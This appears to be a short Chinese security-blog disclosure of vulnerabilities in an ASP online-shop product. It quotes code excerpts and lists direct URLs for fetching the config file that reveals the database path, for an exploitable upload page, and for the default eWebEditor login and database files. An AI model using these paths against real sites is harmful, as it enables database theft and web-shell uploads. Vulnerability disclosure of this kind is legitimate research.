风渡科技ASP网上购物v11.919漏洞
MakeBug Micropoor@163.com
'conn.asp
<%
On Error Resume Next
servermappath=server.mappath("/serverinfo.asa")
'略
DBstr=""&txt.ReadLine&"" '数据库地址名称
'略
%>
读取serverinfo.asa
'serverinfo.asa
/chinammc_data/chinammc_shop.mdb
利用方法:
http://www.iick.blog/serverinfo.asa
'\fd_upload\upfile.asp
<title>文件上传</title>
<!--#include file="class.asp"-->
<%
'略
if upload.form("EditName")<>"x_file" then
if fileExt<>"swf" and fileExt<>"jpg" and fileExt<>"gif" and fileExt<>"bmp" and fileExt<>"jpeg" and fileExt<>"tif" then%>
<span style=""font-family: 宋体; font-size: 9pt"">上传中止!只能上传图片格式的文件! [ <a href=# onclick=history.go(-1)>重新上传</a> ]</span>
'略
%>
经典的上传漏洞。
默认地址:
http://www.iick.blog/fd_upload/upload.asp
默认eWebEditor登陆地址:
http://www.iick.blog/_eWebEditor/760706bjsdyt_2007-0827.asp
默认数据库地址:
http://www.iick.blog/eWebEditor/yasda612376asdga656qtfyfsw656q/35275twfd3562qfwsayqtwreq.mdb
上一篇:宏飞企业网站管理系统漏洞
下一篇:DOS环境下如何建立并访问内外网